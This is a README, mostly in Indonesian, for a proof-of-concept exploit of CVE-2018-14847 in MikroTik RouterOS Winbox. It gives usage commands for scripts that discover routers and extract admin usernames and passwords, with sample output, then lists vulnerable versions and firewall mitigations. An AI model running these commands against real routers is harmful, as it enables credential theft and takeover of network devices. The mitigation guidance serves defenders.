PoC of CVE-2018-14847 Mikrotik Vulnerability using simple script# Mikrotik Login Exploit
PoC (Proof of Concept) dari vulnerability mikrotik CVE-2018-14847 (terutama pada winbox), memiliki cara kerja membaca password langsung dari RouterOS pada port default 8291.
Original by: https://github.com/BigNerd95/
## Requirements
- Python 3+
### Instalasi pada Linux
```
apt install python3
```
## Contoh Penggunaan
#### WinBox (TCP/IP)
```
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
```
e.g:
```
$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123
```
#### Menggunakan MAC Address
Anda bisa menggunakan script ini walau tanpa IP address.
Gunakan MACServerDiscovery.py untuk scan router.
```
python3 MACServerDiscover.py
```
e.g:
```
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
```
Exploitasi:
```
python3 MACServerExploit.py <MAC-ADDRESS>
```
e.g:
```
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: oppaidaisuki123
```
## Vulnerable Versions
RouterOS keluaran 2015-05-28 s/d 2018-04-20
RouterOS versions:
- Longterm: 6.30.1 - 6.40.7
- Stable: 6.29 - 6.42
- Beta: 6.29rc1 - 6.43rc3
Info selengkapnya : https://blog.mikrotik.com/security/winbox-vulnerability.html
## Pencegahan Exploit
- Upgrade RouterOS ke 6.42+
- Nonaktifkan Winbox
- Blok service:
```
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
```
- Filter Rules (ACL), blok port 8291:
```
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
```
- Batasi akses login winbox dari MAC Adress:
```
/tool mac-server mac-winbox
```
[4.0K] /data/pocs/97c98a9b8fdca3b85a96dbb79df70359436bc9f8
├── [1.5K] extract_user.py
├── [ 991] MACServerDiscover.py
├── [5.1K] MACServerExploit.py
├── [1.6K] README.md
└── [2.2K] WinboxExploit.py
0 directories, 5 files